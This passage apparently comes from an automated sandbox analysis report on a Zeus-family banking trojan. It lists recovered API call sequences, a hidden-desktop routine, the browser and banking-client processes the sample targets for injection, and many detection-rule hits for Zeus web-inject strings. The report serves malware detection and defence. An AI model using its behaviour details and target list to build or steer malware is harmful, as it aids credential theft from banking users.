trIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|7_2_01056370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|7_2_01043510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe9_2_00A35890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe9_2_00A35890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe9_2_00A35890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe9_2_00A35890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|9_2_00A36370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|9_2_00A23510
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C786C0 CreateDesktopA,SetThreadDesktop,memset,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,SetThreadDesktop,memset,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,2_2_02C786C0

System Summary

Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.fe2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.13.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.3.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2c70000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.56.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2560000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.34.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.30.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.20.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.36.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.28.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ea2000.1.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.33.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.45.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.21.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f380000.11.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.14.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.38.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.20.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.4.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.24f2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.d30000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.cd2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.40.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.29.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.52.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.36.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.b00000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.45.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.UMwpXhA46R.exe.406400.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2af2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.cd2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.56.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2cd1c00.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.12.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.27a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.49.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.26.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1240000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ca0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29f3c00.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.d580000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.a20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11e2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.UMwpXhA46R.exe.708de8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.50.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.15b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.49.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3c40000.17.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1552000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11d2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.b00000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.53.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.fe2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.14.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.53.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.21.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.39.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2672000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.25f2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.50.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.47.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3040000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29a2000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.d580000.10.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.8.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.43.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.22.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.44.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1240000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
